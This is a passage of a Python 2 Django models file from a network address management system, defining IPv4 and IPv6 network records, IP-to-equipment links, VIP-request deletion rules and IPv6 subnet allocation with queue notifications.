return Ip.objects.get(oct1=oct1, oct2=oct2, oct3=oct3, oct4=oct4, networkipv4__vlan__ambiente__id=id_environment)
except ObjectDoesNotExist, e:
raise IpNotFoundError(e, u'There is no IP %s.%s.%s.%s of the environment %s.' % (
oct1, oct2, oct3, oct4, id_environment))
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP.')
# @classmethod
# def valid_real_server(cls, oct1, oct2, oct3, oct4, id_evip, real_name):
# """Validation
# @param name_equip:
# @param ip_real:
# @param id_evip:
# @return: On success: vip_map, vip, None
# In case of error: vip_map, vip, code (code error message).
# @todo: fix everything
# """
# try:
# return Ip.objects.get(oct1=oct1, oct2=oct2, oct3=oct3, oct4=oct4, networkipv4__ambient_vip__id=id_evip, ipequipamento__equipamento__nome=real_name)
# except ObjectDoesNotExist, e:
# raise IpNotFoundError(e, u'')
# except Exception, e:
# cls.log.error(u'')
# raise IpError(e, u'')
@classmethod
def get_by_octs(cls, oct1, oct2, oct3, oct4):
"""Get IP by octs.
@return: IP.
@raise IpNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
ips = Ip.objects.filter(oct1=oct1, oct2=oct2, oct3=oct3, oct4=oct4)
if len(ips) == 0:
raise ObjectDoesNotExist()
return ips
except ObjectDoesNotExist, e:
raise IpNotFoundError(
e, u'There is no IP = %s.%s.%s.%s.' % (oct1, oct2, oct3, oct4))
except Exception, e:
cls.log.error(u'Failure to search the IP.')
raise IpError(e, u'Failure to search the IP.')
def delete(self):
"""Sobrescreve o método do Django para remover um IP.
Antes de remover o IP remove todas as suas requisições de VIP e os relacionamentos com equipamentos.
"""
try:
for r in self.requisicaovips_set.all():
r_alter = False
# Assures VIP request is not being changed - issue #48
with distributedlock(LOCK_VIP % r.id):
# updates query after lock for object
r = self.requisicaovips_set.get(id=r.id)
id_vip = r.id
if r.vip_criado:
raise IpCantBeRemovedFromVip(
r.id, 'Ipv4 cannot be removed because it is in use by Vip Request %s' % (r.id))
else:
if r.ipv6 is not None:
r.ip = None
r.validado = 0
r.save()
r_alter = True
# SYNC_VIP
syncs.old_to_new(r)
if not r_alter:
r.delete()
# SYNC_VIP
syncs.delete_new(id_vip)
for ie in self.ipequipamento_set.all():
# Code removed: we must not remove the equipment's environment even if it has no IP
# for the environment, as requested by Henrique
# ambienteequip = EquipamentoAmbiente()
# ambienteequip = ambienteequip.get_by_equipment_environment(
# ie.equipamento.id, self.networkipv4.vlan.ambiente_id)
#
# ips = Ip.list_by_environment_and_equipment(
# ambienteequip.ambiente_id, ie.equipamento.id)
# ips6 = Ipv6.list_by_environment_and_equipment(
# ambienteequip.ambiente_id, ie.equipamento.id)
#
# if len(ips) <= 1 and len(ips6) <= 0:
#
# ambienteequip.delete()
ie.delete()
ip_slz = get_app('api_ip', module_label='serializers')
serializer = ip_slz.Ipv4V3Serializer(self)
data_to_queue = serializer.data
# Deletes Obj IP
super(Ip, self).delete()
# Sends to Queue
queue_manager = QueueManager()
data_to_queue.update({'description': queue_keys.IPv4_REMOVE})
queue_manager.append({
'action': queue_keys.IPv4_REMOVE,
'kind': queue_keys.IPv4_KEY,
'data': data_to_queue
})
# Dispatch the queued message, mirroring delete_v3 below
queue_manager.send()
except EquipamentoAmbienteNotFoundError, e:
raise EquipamentoAmbienteNotFoundError(None, e.message)
except IpCantBeRemovedFromVip, e:
raise IpCantBeRemovedFromVip(e.cause, e.message)
except IpEquipmentNotFoundError, e:
raise IpEquipmentNotFoundError(None, e.message)
def delete_v3(self):
"""
Method V3 to remove Ip.
Before removing the IP, removes all of its VIP requests
and its relationships with equipment.
@raise IpCantBeRemovedFromVip: Ip is associated with created
Vip Request.
"""
try:
for vip in self.viprequest_set.all():
id_vip = vip.id
with distributedlock(LOCK_VIP % id_vip):
if vip.created:
raise IpCantBeRemovedFromVip(
id_vip,
'IPv4 can not be removed because it is '
'in use by Vip Request %s' % (id_vip))
# Deletes only VIP, Related Ipv6 with VIP is not removed
vip.delete_v3(bypass_ipv4=True, bypass_ipv6=True)
# Deletes Related Equipment
for ip_eqpt in self.ipequipamento_set.all():
ip_eqpt.delete_v3()
# Serializes obj
ip_slz = get_app('api_ip', module_label='serializers')
serializer = ip_slz.Ipv4V3Serializer(self)
data_to_queue = serializer.data
# Deletes Obj IP
super(Ip, self).delete()
# Sends to Queue
queue_manager = QueueManager()
data_to_queue.update({'description': queue_keys.IPv4_REMOVE})
queue_manager.append({
'action': queue_keys.IPv4_REMOVE,
'kind': queue_keys.IPv4_KEY,
'data': data_to_queue
})
queue_manager.send()
except IpCantBeRemovedFromVip, e:
raise IpCantBeRemovedFromVip(e.cause, e.message)
# def create_v3(self, authenticated_user, equipment_id, id, new):
# """Persist an IPv4 and associate it to an equipment.
# If equipment was not related with VLAN environment, this makes the relationship
# @return: Nothing
# @raise NetworkIPv6NotFoundError: NetworkIPv6 does not exist.
# @raise NetworkIPv6Error: Error finding NetworkIPv6.
# @raise EquipamentoNotFoundError: Equipment does not exist.
# @raise EquipamentoError: Error finding Equipment.
# @raise IpNotAvailableError: No IP available to VLAN.
# @raise IpError: Error persisting in database.
# """
# if new is False:
# # Search vlan by id
# vlan = Vlan().get_by_pk(id)
# # Get first networkipv4 related to vlan
# try:
# self.networkipv4 = vlan.networkipv4_set.order_by('id')[0]
# except IndexError, e:
# self.log.error(
# u'Error finding the first networkipv4 from vlan.')
# raise NetworkIPv4NotFoundError(
# e, u'Error finding the first networkipv4 from vlan.')
# else:
# self.networkipv4 = NetworkIPv4().get_by_pk(id)
# # Cast to API
# net4 = IPNetwork(self.networkipv4.networkv4)
# # Find all ips related to the network
# ips = networkipv4.ip_set.all()
# # Cast all to API class
# ipsv4 = set([IPv4Address(ip.ip_formated) for ip in ips])
# # Get configuration
# conf=Configuration.get()
# selected_ip=None
# # For each ip generated
# i=0
# for ip in net4.iterhosts():
# # Do not use some range of IPs (config)
# # IPv4_MIN = number of reserved IPs at the start of the range
# # IPv4_MAX = number of reserved IPs at the end of the range
# # (e.g. the first IP and the 2 last IPs)
# i=i + 1
# if i >= conf.IPv4_MIN and i < (net4.numhosts - conf.IPv4_MAX):
# # If IP generated was not used
# if ip not in ipsv4:
# # Use it
# selected_ip=ip
# # Stop generation
# break
# if selected_ip is None:
# raise IpNotAvailableError(
# None, u'No IP available to VLAN %s.' % self.networkipv4.vlan.num_vlan)
# self.oct1, self.oct2, self.oct3, self.oct4=str(
# selected_ip).split('.')
# equipment=Equipamento().get_by_pk(equipment_id)
# try:
# self.save()
# ip_equipment=IpEquipamento()
# ip_equipment.ip=self
# ip_equipment.equipamento=equipment
# ip_equipment.save(authenticated_user)
# try:
# equipment_environment=EquipamentoAmbiente().get_by_equipment_environment(equipment_id,
# self.networkipv4.vlan.ambiente_id)
# except EquipamentoAmbienteNotFoundError:
# equipment_environment=EquipamentoAmbiente()
# equipment_environment.equipamento=equipment
# equipment_environment.ambiente=self.networkipv4.vlan.ambiente
# equipment_environment.save(authenticated_user)
# except Exception, e:
# self.log.error(
# u'Error adding new IP or relationship ip-equipment.')
# raise IpError(
# e, u'Error adding new IP or relationship ip-equipment.')
class IpEquipamento(BaseModel):
id = models.AutoField(
primary_key=True,
db_column='id_ips_dos_equipamentos'
)
ip = models.ForeignKey(
'ip.Ip',
db_column='id_ip'
)
equipamento = models.ForeignKey(
'equipamento.Equipamento',
db_column='id_equip'
)
log = logging.getLogger('IpEquipamento')
class Meta(BaseModel.Meta):
db_table = u'ips_dos_equipamentos'
managed = True
unique_together = ('ip', 'equipamento')
@classmethod
def get_by_ip(cls, ip_id):
"""Get IP by id_ip
@return: IP.
@raise IpEquipmentNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
return IpEquipamento.objects.filter(ip__id=ip_id).uniqueResult()
except ObjectDoesNotExist, e:
raise IpEquipmentNotFoundError(
e, u'There is no IP-Equipment for IP = %s.' % ip_id)
except Exception, e:
cls.log.error(u'Failure to search the Ip-Equipment.')
raise IpError(e, u'Failure to search the Ip-Equipment.')
@classmethod
def list_by_ip(cls, ip_id):
"""Get IP by id_ip
@return: IP.
@raise IpEquipmentNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
return IpEquipamento.objects.filter(ip__id=ip_id)
except ObjectDoesNotExist, e:
raise IpEquipmentNotFoundError(
e, u'There is no IP-Equipment for IP = %s.' % ip_id)
except Exception, e:
cls.log.error(u'Failure to search the Ip-Equipment.')
raise IpError(e, u'Failure to search the Ip-Equipment.')
@classmethod
def list_by_equip(cls, equip_id):
"""Get IP by id_ip
@return: IPEquipment.
@raise IpEquipmentNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
return IpEquipamento.objects.filter(equipamento__id=equip_id)
except ObjectDoesNotExist, e:
raise IpEquipmentNotFoundError(
e, u'There is no IP-Equipment for Equipment = %s.' % equip_id)
except Exception, e:
cls.log.error(u'Failure to search the Ip-Equipment.')
raise IpError(e, u'Failure to search the Ip-Equipment.')
@classmethod
def get_by_ip_equipment(cls, ip_id, equip_id):
"""Get IP by id and equip_id.
@return: IP.
@raise IpEquipmentNotFoundError: IP is not registered.
@raise IpError: Failed to search for the IP.
"""
try:
return IpEquipamento.objects.get(ip__id=ip_id, equipamento__id=equip_id)
except ObjectDoesNotExist, e:
raise IpEquipmentNotFoundError(
e, u'There is no IP-Equipment for IP = %s and Equipment = %s.' % (ip_id, equip_id))
except Exception, e:
cls.log.error(u'Failure to search the Ip-Equipment.')
raise IpError(e, u'Failure to search the Ip-Equipment.')
def __validate_ip(self):
try:
IpEquipamento.objects.get(ip=self.ip, equipamento=self.equipamento)
raise IpEquipamentoDuplicatedError(
None, u'IP already registered for this equipment.')
except ObjectDoesNotExist:
pass
def create(self, authenticated_user, ip_id, equipment_id):
"""Insere um relacionamento entre IP e Equipamento.
@return: Nothing.
@raise IpError: Falha ao inserir.
@raise EquipamentoNotFoundError: Equipamento não cadastrado.
@raise IpNotFoundError: Ip não cadastrado.
@raise IpEquipamentoDuplicatedError: IP já cadastrado para o equipamento.
@raise EquipamentoError: Falha ao pesquisar o equipamento.
"""
self.equipamento = Equipamento().get_by_pk(equipment_id)
self.ip = Ip().get_by_pk(ip_id)
# Validate the ip
self.__validate_ip()
try:
if self.equipamento not in [ea.equipamento for ea in self.ip.networkipv4.vlan.ambiente.equipamentoambiente_set.all().select_related('equipamento')]:
ea = EquipamentoAmbiente(
ambiente=self.ip.networkipv4.vlan.ambiente, equipamento=self.equipamento)
ea.save(authenticated_user)
self.save()
except Exception, e:
self.log.error(u'Failure to insert an ip_equipamento.')
raise IpError(e, u'Failure to insert an ip_equipamento.')
def delete(self):
"""Override Django's method to remove Ip and Equipment relationship.
If Ip from this Ip-Equipment is associated with created Vip Request, and the Equipment
is the last balancer associated, the IpEquipment association cannot be removed.
If Ip has no relationship with other Equipments, then Ip is also removed.
"""
for r in self.ip.requisicaovips_set.all():
if self.equipamento.tipo_equipamento == TipoEquipamento.get_tipo_balanceador():
# Get all equipments (except the one being removed) related to ip
# to find another balancer
other_equips = self.ip.ipequipamento_set.exclude(
equipamento=self.equipamento.id)
another_balancer = False
for ipequip in other_equips:
if ipequip.equipamento.tipo_equipamento == TipoEquipamento.get_tipo_balanceador():
another_balancer = True
break
if not another_balancer:
if r.vip_criado:
raise IpEquipCantDissociateFromVip({'vip_id': r.id, 'ip': mount_ipv4_string(
self.ip), 'equip_name': self.equipamento.nome}, 'Ipv4 cannot be dissociated from equipment %s because it is the last balancer of Vip Request %s.' % (self.equipamento.nome, r.id))
else:
# Remove ip from vip or remove vip
id_vip = r.id
if r.ipv6 is not None:
r.ip = None
r.validado = 0
r.save()
# SYNC_VIP
syncs.old_to_new(r)
else:
r.delete()
# SYNC_VIP
syncs.delete_new(id_vip)
if self.ip.serverpoolmember_set.count() > 0:
server_pool_identifiers = set()
for svm in self.ip.serverpoolmember_set.all():
item = '{}:{}'.format(svm.server_pool.id,
svm.server_pool.identifier)
server_pool_identifiers.add(item)
server_pool_identifiers = list(server_pool_identifiers)
server_pool_identifiers = ', '.join(
str(server_pool) for server_pool in server_pool_identifiers)
raise IpCantRemoveFromServerPool({'ip': mount_ipv4_string(self.ip), 'equip_name': self.equipamento.nome, 'server_pool_identifiers': server_pool_identifiers},
'Ipv4 cannot be dissociated from equipment %s because it is being used in the Server Pools (id:identifier) %s' % (self.equipamento.nome, server_pool_identifiers))
super(IpEquipamento, self).delete()
# If the IP is not related to any other equipment, it is removed
if self.ip.ipequipamento_set.count() == 0:
self.ip.delete()
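# Sketch of the "last balancer" rule enforced above (illustrative; the ids
# are hypothetical). If the IP backs a created Vip Request and this
# equipment is its only balancer-type equipment, delete() must refuse:
#
#     ip_equip = IpEquipamento.get_by_ip_equipment(ip_id=10, equip_id=42)
#     try:
#         ip_equip.delete()
#     except IpEquipCantDissociateFromVip:
#         pass  # equipment 42 is the last balancer of a created Vip Request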
def delete_v3(self):
"""
Method V3 to remove Ip and Equipment relationship.
If Ip from this Ip-Equipment is associated with created Vip Request,
and the Equipment is the last balancer associated, the IpEquipment
association cannot be removed.
If Ip has no relationship with other Equipments, then Ip is also removed.
@raise IpCantRemoveFromServerPool: Ip is associated with a
Pool Member.
@raise IpEquipCantDissociateFromVip: Equipment is the last balancer
in a created Vip Request
pointing to ip.
"""
type_eqpt = TipoEquipamento.get_tipo_balanceador()
if self.equipamento.tipo_equipamento == type_eqpt:
for vip in self.ip.viprequest_set.all():
# Filter equipments to find another balancer
another_balancer = self.ip.ipequipamento_set.exclude(
equipamento=self.equipamento.id
).filter(equipamento__tipo_equipamento=type_eqpt)
id_vip = vip.id
if not another_balancer:
with distributedlock(LOCK_VIP % id_vip):
if vip.created:
raise IpEquipCantDissociateFromVip(
{
'vip_id': id_vip,
'ip': self.ip.ip_formated,
'equip_name': self.equipamento.nome
},
'IPv4 can not be dissociated from the '
'equipment %s because it is the last '
'balancer of Vip Request %s.'
% (self.equipamento.nome, id_vip)
)
else:
# Remove ip from vip
if vip.ipv6 is not None:
vip.ipv4 = None
vip.save()
# SYNC_VIP
syncs.new_to_old(vip)
# Remove vip
else:
vip.delete_v3(bypass_ipv4=True,
bypass_ipv6=True)
if self.ip.serverpoolmember_set.count() > 0:
items = ['{}:{}'.format(
svm.server_pool.id,
svm.server_pool.identifier
) for svm in self.ip.serverpoolmember_set.all()]
items = ', '.join(items)
raise IpCantRemoveFromServerPool(
{
'ip': self.ip.ip_formated,
'equip_name': self.equipamento.nome,
'server_pool_identifiers': items
},
'IPv4 cannot be dissociated from the equipment %s because it '
'is being used in the Server Pools (id:identifier) %s' %
(self.equipamento.nome, items)
)
super(IpEquipamento, self).delete()
# If the IP is not related to any other equipment, it is removed
if self.ip.ipequipamento_set.count() == 0:
self.ip.delete_v3()
def create_v3(self, ip_equipment):
"""Inserts a relationship between IP e Equipment.
@return: Nothing.
@raise IpError: Failure to insert.
@raise EquipamentoNotFoundError: Equipment do not registered.
@raise IpNotFoundError: Ip do not registered.
@raise IpEquipamentoDuplicatedError: IP already registered for the equipment.
@raise EquipamentoError: Failure to search equipment.
"""
self.equipamento = Equipamento().get_by_pk(ip_equipment.get('equipment'))
self.ip = Ip().get_by_pk(ip_equipment.get('ip'))
# Validate the ip
self.__validate_ip()
try:
# All equipments related with environment of IP
eqpts = self.ip.networkipv4.vlan.ambiente\
.equipamentoambiente_set.all()\
.values_list('equipamento', flat=True)
if ip_equipment.get('equipment') not in eqpts:
ea = EquipamentoAmbiente(
ambiente=self.ip.networkipv4.vlan.ambiente,
equipamento=self.equipamento
)
ea.save()
self.save()
except Exception, e:
self.log.error(u'Failure to insert an ip_equipamento.')
raise IpError(e, u'Failure to insert an ip_equipamento.')
def remove(self, authenticated_user, ip_id, equip_id):
"""Search and remove relationship between IP and equipment.
@return: Nothing
@raise IpEquipmentNotFoundError: There's no relationship between Ip and Equipment.
@raise IpCantBeRemovedFromVip: Ip is associated with created Vip Request.
@raise IpEquipCantDissociateFromVip: Equipment is the last balancer in a created Vip Request pointing to the ip.
@raise IpError: Failed to remove the relationship.
"""
ip_equipamento = self.get_by_ip_equipment(ip_id, equip_id)
try:
ip_equipamento.delete()
except (IpCantBeRemovedFromVip, IpEquipCantDissociateFromVip), e:
raise e
except Exception, e:
self.log.error(u'Failure to remove an ip_equipamento.')
raise IpError(e, u'Failure to remove an ip_equipamento.')
class NetworkIPv6(BaseModel):
id = models.AutoField(
primary_key=True
)
vlan = models.ForeignKey(
'vlan.Vlan',
db_column='id_vlan'
)
network_type = models.ForeignKey(
'vlan.TipoRede',
null=True,
db_column='id_tipo_rede'
)
ambient_vip = models.ForeignKey(
'ambiente.EnvironmentVip',
null=True,
db_column='id_ambientevip'
)
block = models.IntegerField(
db_column='bloco'
)
block1 = models.CharField(
max_length=4,
db_column='bloco1'
)
block2 = models.CharField(
max_length=4,
db_column='bloco2'
)
block3 = models.CharField(
max_length=4,
db_column='bloco3'
)
block4 = models.CharField(
max_length=4,
db_column='bloco4'
)
block5 = models.CharField(
max_length=4,
db_column='bloco5'
)
block6 = models.CharField(
max_length=4,
db_column='bloco6'
)
block7 = models.CharField(
max_length=4,
db_column='bloco7'
)
block8 = models.CharField(
max_length=4,
db_column='bloco8'
)
mask1 = models.CharField(
max_length=4,
db_column='mask_bloco1'
)
mask2 = models.CharField(
max_length=4,
db_column='mask_bloco2'
)
mask3 = models.CharField(
max_length=4,
db_column='mask_bloco3'
)
mask4 = models.CharField(
max_length=4,
db_column='mask_bloco4'
)
mask5 = models.CharField(
max_length=4,
db_column='mask_bloco5'
)
mask6 = models.CharField(
max_length=4,
db_column='mask_bloco6'
)
mask7 = models.CharField(
max_length=4,
db_column='mask_bloco7'
)
mask8 = models.CharField(
max_length=4,
db_column='mask_bloco8'
)
cluster_unit = models.CharField(
max_length=45,
db_column='cluster_unit'
)
active = models.BooleanField()
log = logging.getLogger('NetworkIPv6')
class Meta(BaseModel.Meta):
db_table = u'redeipv6'
managed = True
def _get_formated_ip(self):
"""Returns formated ip."""
return '%s:%s:%s:%s:%s:%s:%s:%s/%s' % (self.block1, self.block2, self.block3,
self.block4, self.block5, self.block6,
self.block7, self.block8, self.block)
networkv6 = property(_get_formated_ip)
def _get_formated_mask(self):
"""Returns formated mask."""
return '%s:%s:%s:%s:%s:%s:%s:%s' % (self.mask1, self.mask2, self.mask3, self.mask4,
self.mask5, self.mask6, self.mask7, self.mask8)
mask_formated = property(_get_formated_mask)
def _get_formated_octs(self):
"""Returns formated octs."""
return '%s:%s:%s:%s:%s:%s:%s:%s' % (
self.block1, self.block2, self.block3, self.block4,
self.block5, self.block6, self.block7, self.block8)
formated_octs = property(_get_formated_octs)
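# Formatting sketch (illustrative; assumes the mask fields persist the
# expanded /64 netmask). For a row with block1 = 'fdbe', the remaining
# blocks '0000', and block = 64:
#
#     net.networkv6       # 'fdbe:0000:0000:0000:0000:0000:0000:0000/64'
#     net.formated_octs   # 'fdbe:0000:0000:0000:0000:0000:0000:0000'
#     net.mask_formated   # 'ffff:ffff:ffff:ffff:0000:0000:0000:0000'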
@cached_property
def dhcprelay(self):
dhcprelay = self.dhcprelayipv6_set.all()
return dhcprelay
@classmethod
def get_by_pk(cls, id):
"""Get NetworkIPv6 by id.
@return: NetworkIPv6.
@raise NetworkIPv6NotFoundError: NetworkIPv6 is not registered.
@raise NetworkIPv6Error: Failed to search for the NetworkIPv6.
@raise OperationalError: Lock wait timeout exceeded.
"""
try:
return NetworkIPv6.objects.filter(id=id).uniqueResult()
except ObjectDoesNotExist, e:
raise NetworkIPv6NotFoundError(
e, u'Can not find a NetworkIPv6 with id = %s.' % id)
except OperationalError, e:
cls.log.error(u'Lock wait timeout exceeded.')
raise OperationalError(
e, u'Lock wait timeout exceeded; try restarting transaction')
except Exception, e:
cls.log.error(u'Error finding NetworkIPv6.')
raise NetworkIPv6Error(e, u'Error finding NetworkIPv6.')
def activate(self, authenticated_user):
try:
self.active = 1
self.save()
net_slz = get_app('api_network', 'serializers.v3')
serializer = net_slz.NetworkIPv6V3Serializer(
self,
include=('vlan__details__environment__basic',))
data_to_queue = serializer.data
data_to_queue.update({
'description': queue_keys.NETWORKv6_ACTIVATE
})
# Send to Queue
queue_manager = QueueManager()
queue_manager.append({
'action': queue_keys.NETWORKv6_ACTIVATE,
'kind': queue_keys.NETWORKv6_KEY,
'data': data_to_queue
})
queue_manager.send()
except Exception, e:
self.log.error(u'Error activating NetworkIPv6.')
raise NetworkIPv6Error(e, u'Error activating NetworkIPv6.')
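# Shape of the message appended above (illustrative; the 'data' payload is
# whatever NetworkIPv6V3Serializer emits, plus the description key):
#
#     {
#         'action': queue_keys.NETWORKv6_ACTIVATE,
#         'kind': queue_keys.NETWORKv6_KEY,
#         'data': {..., 'description': queue_keys.NETWORKv6_ACTIVATE}
#     }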
def deactivate(self, authenticated_user, commit=False):
"""
Update status column to 'active = 0'
@param authenticated_user: Authenticated user
@raise NetworkIPv6Error: Error disabling NetworkIPv6.
"""
try:
self.active = 0
self.save(authenticated_user, commit=commit)
net_slz = get_app('api_network', 'serializers.v3')
serializer = net_slz.NetworkIPv6V3Serializer(
self,
include=('vlan__details__environment__basic',))
data_to_queue = serializer.data
data_to_queue.update({
'description': queue_keys.NETWORKv6_DEACTIVATE
})
# Send to Queue
queue_manager = QueueManager()
queue_manager.append({
'action': queue_keys.NETWORKv6_DEACTIVATE,
'kind': queue_keys.NETWORKv6_KEY,
'data': data_to_queue
})
queue_manager.send()
except Exception, e:
self.log.error(u'Error disabling NetworkIPv6.')
raise NetworkIPv6Error(e, u'Error disabling NetworkIPv6.')
def edit_network_ipv6(self, authenticated_user, id_net_type, id_env_vip, cluster_unit):
try:
self.network_type = id_net_type
self.ambient_vip = id_env_vip
self.cluster_unit = cluster_unit
self.save()
except Exception, e:
self.log.error(u'Error updating NetworkIPv6.')
raise NetworkIPv6Error(e, u'Error updating NetworkIPv6.')
def add_network_ipv6(self, user, id_vlan, network_type, evip, prefix=None):
"""
Insert new NetworkIPv6 in database
@return: Vlan map
@raise VlanNotFoundError: Vlan is not registered.
@raise VlanError: Failed to search for the Vlan
@raise ConfigEnvironmentInvalidError: Invalid Environment Configuration or not registered
@raise NetworkIPv6Error: Error persisting a NetworkIPv6.
@raise NetworkIPv6AddressNotAvailableError: Unavailable address to create a NetworkIPv6.
@raise InvalidValueError: Network type does not exist.
"""
self.vlan = Vlan().get_by_pk(id_vlan)
network_found = None
stop = False
internal_network_type = None
type_ipv6 = IP_VERSION.IPv6[0]
try:
# Find all configs type v6 in environment
configs = ConfigEnvironment.get_by_environment(
self.vlan.ambiente.id).filter(ip_config__type=IP_VERSION.IPv6[0])
# If not found, an exception is thrown
if len(configs) == 0:
raise ConfigEnvironmentInvalidError(
None, u'Invalid Configuration')
# Find all networks related to the environment
nets = NetworkIPv6.objects.filter(
vlan__ambiente__id=self.vlan.ambiente.id)
# Cast to API class
networksv6 = set([(IPv6Network(
'%s:%s:%s:%s:%s:%s:%s:%s/%s' %
(net_ip.block1, net_ip.block2, net_ip.block3,
net_ip.block4, net_ip.block5, net_ip.block6,
net_ip.block7, net_ip.block8, net_ip.block))) for net_ip in nets])
# For each configuration found in the environment
for config in configs:
# If a network has already been found, stop
if stop:
break
# Need to be IPv6
if config.ip_config.type == IP_VERSION.IPv6[0]:
net6 = IPv6Network(config.ip_config.subnet)
if prefix is not None:
new_prefix = int(prefix)
else:
new_prefix = int(config.ip_config.new_prefix)
self.log.info(u'Prefix that will be used: %s' % new_prefix)
# For each subnet generated with configs
for subnet in net6.iter_subnets(new_prefix=new_prefix):
# Checks if the network generated is UNUSED
if subnet not in networksv6:
in_range = network_in_range(
self.vlan, subnet, type_ipv6)
if not in_range:
continue
# Otherwise, this one will be used
network_found = subnet
if network_type:
internal_network_type = network_type
elif config.ip_config.network_type is not None:
internal_network_type = config.ip_config.network_type
else:
self.log.error(
u'Parameter tipo_rede is invalid. Value: %s', network_type)
raise InvalidValueError(
None, 'network_type', network_type)
# Stop generation logic
stop = True
break
# If the config is not IPv6
else:
# Throw an exception
raise ConfigEnvironmentInvalidError(
None, u'Invalid Configuration')
except (ValueError, TypeError, AddressValueError), e:
raise ConfigEnvironmentInvalidError(e, u'Invalid Configuration')
# Check whether any available network was found
if network_found is None:
# If not found, an exception is thrown
raise NetworkIPv6AddressNotAvailableError(
None, u'Unavailable address to create a NetworkIPv6.')
# Set blocks from the generated network
self.block1, self.block2, self.block3, self.block4, self.block5, self.block6, self.block7, self.block8 = str(
network_found.network.exploded).split(':')
# Set prefix length from the generated network
self.block = network_found.prefixlen
# Set mask by network generated
self.mask1, self.mask2, self.mask3, self.mask4, self.mask5, self.mask6, self.mask7, self.mask8 = str(
network_found.netmask.exploded).split(':')
try:
# Set Network Type
self.network_type = internal_network_type
# Set Environment VIP
self.ambient_vip = evip
self.save()
except Exception, e:
self.log.error(u'Error persisting a NetworkIPv6.')
raise NetworkIPv6Error(e, u'Error persisting a NetworkIPv6.')
# Return vlan map
vlan_map = dict()
vlan_map['id'] = self.vlan.id
vlan_map['nome'] = self.vlan.nome
vlan_map['num_vlan'] = self.vlan.num_vlan
vlan_map['id_tipo_rede'] = self.network_type.id
vlan_map['id_ambiente'] = self.vlan.ambiente.id
vlan_map['bloco1'] = self.block1
vlan_map['bloco2'] = self.block2
vlan_map['bloco3'] = self.block3
vlan_map['bloco4'] = self.block4
vlan_map['bloco5'] = self.block5
vlan_map['bloco6'] = self.block6
vlan_map['bloco7'] = self.block7
vlan_map['bloco8'] = self.block8
vlan_map['bloco'] = self.block
vlan_map['mask_bloco1'] = self.mask1
vlan_map['mask_bloco2'] = self.mask2
vlan_map['mask_bloco3'] = self.mask3
vlan_map['mask_bloco4'] = self.mask4
vlan_map['mask_bloco5'] = self.mask5
vlan_map['mask_bloco6'] = self.mask6
vlan_map['mask_bloco7'] = self.mask7
vlan_map['mask_bloco8'] = self.mask8
vlan_map['descricao'] = self.vlan.descricao
vlan_map['acl_file_name'] = self.vlan.acl_file_name
vlan_map['acl_valida'] = self.vlan.acl_valida
vlan_map['acl_file_name_v6'] = self.vlan.acl_file_name_v6
vlan_map['acl_valida_v6'] = self.vlan.acl_valida_v6
vlan_map['ativada'] = self.vlan.ativada
vlan_map['id_network'] = self.id
net_map = dict()
net_map['vlan'] = vlan_map
return net_map
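# Return-value sketch (keys taken from the assignments above; values are
# hypothetical):
#
#     {'vlan': {'id': 3, 'nome': 'VLAN_EXAMPLE', 'num_vlan': 300,
#               'bloco1': 'fdbe', 'bloco': 64, 'mask_bloco1': 'ffff',
#               'id_network': 17, ...}}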
def delete(self):
try:
for ip in self.ipv6_set.all():
ip.delete()
super(NetworkIPv6, self).delete()
except IpCantBeRemovedFromVip, e:
# Network id and ReqVip id
net_name = str(self.block1) + ':' + str(self.block2) + \
':' + str(self.block3) + ':' + str(self.block4) + ':'
net_name = net_name + str(self.block5) + ':' + str(self.block6) + ':' + str(
self.block7) + ':' + str(self.block8) + '/' + str(self.block)
cause = {'Net': net_name, 'ReqVip': e.cause}
raise IpCantBeRemovedFromVip(
cause, 'This network has a Vip Request pointing to it and cannot be deleted')
def create_v3(self, networkv6):
"""
Create new networkIPv6.
"""
self.block1 = networkv6.get('block1')
self.block2 = networkv6.get('block2')
self.block3 = networkv6.get('block3')
self.block4 = networkv6.get('block4')
self.block5 = networkv6.get('block5')
self.block6 = networkv6.get('block6')
self.block7 = networkv6.get('block7')
self.block8 = networkv6.get('block8')
self.block = networkv6.get('prefix')
self.mask1 = networkv6.get('mask1')
self.mask2 = networkv6.get('mask2')
self.mask3 = networkv6.get('mask3')
self.mask4 = networkv6.get('mask4')
self.mask5 = networkv6.get('mask5')
self.mask6 = networkv6.get('mask6')
self.mask7 = networkv6.get('mask7')
self.mask8 = networkv6.get('mask8')
self.cluster_unit = networkv6.get('cluster_unit')
validate_network = True
if not self.block1 and not self.block2 and not self.block3 and \
not self.block4 and not self.block5 and not self.block6 and \
not self.block7 and not self.block8:
self.allocate_network(networkv6.get(
'vlan'), networkv6.get('prefix'))
validate_network = False
if self.block and self.block1 and self.block2 and self.block3 and \
self.block4 and self.block5 and self.block6 and \
self.block7 and self.block8:
ip = IPNetwork('%s/%s' % (self.formated_octs, self.block))
mask = ip.netmask.exploded.split(':')
self.mask1 = mask[0]
self.mask2 = mask[1]
self.mask3 = mask[2]
self.mask4 = mask[3]
self.mask5 = mask[4]
self.mask6 = mask[5]
self.mask7 = mask[6]
self.mask8 = mask[7]
elif self.mask1 and self.mask2 and self.mask3 and self.mask4 and \
self.mask5 and self.mask6 and self.mask7 and self.mask8:
ip = IPNetwork('%s/%s' % (self.formated_octs, self.mask_formated))
self.block = ip.prefixlen
else:
raise Exception('Either the block or the mask must be sent.')
vlan_model = get_model('vlan', 'Vlan')
self.vlan = vlan_model().get_by_pk(networkv6.get('vlan'))
tiporede_model = get_model('vlan', 'TipoRede')
self.network_type = tiporede_model().get_by_pk(networkv6.get('network_type'))
# has environmentvip
if networkv6.get('environmentvip'):
environmentvip_model = get_model('ambiente', 'EnvironmentVip')
self.ambient_vip = environmentvip_model().get_by_pk(
networkv6.get('environmentvip'))
self.validate_v3()
if validate_network:
self.validate_network()
self.save()
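# Input sketch for create_v3() (keys taken from the .get() calls above;
# values are hypothetical). Send the eight blocks with a prefix or the
# eight masks, or leave every block empty to auto-allocate:
#
#     networkv6 = {
#         'block1': 'fdbe', 'block2': '0000', 'block3': '0000',
#         'block4': '0000', 'block5': '0000', 'block6': '0000',
#         'block7': '0000', 'block8': '0000',
#         'prefix': 64,
#         'cluster_unit': None,
#         'vlan': 3,               # Vlan pk
#         'network_type': 2,       # TipoRede pk
#         'environmentvip': None,  # optional EnvironmentVip pk
#     }
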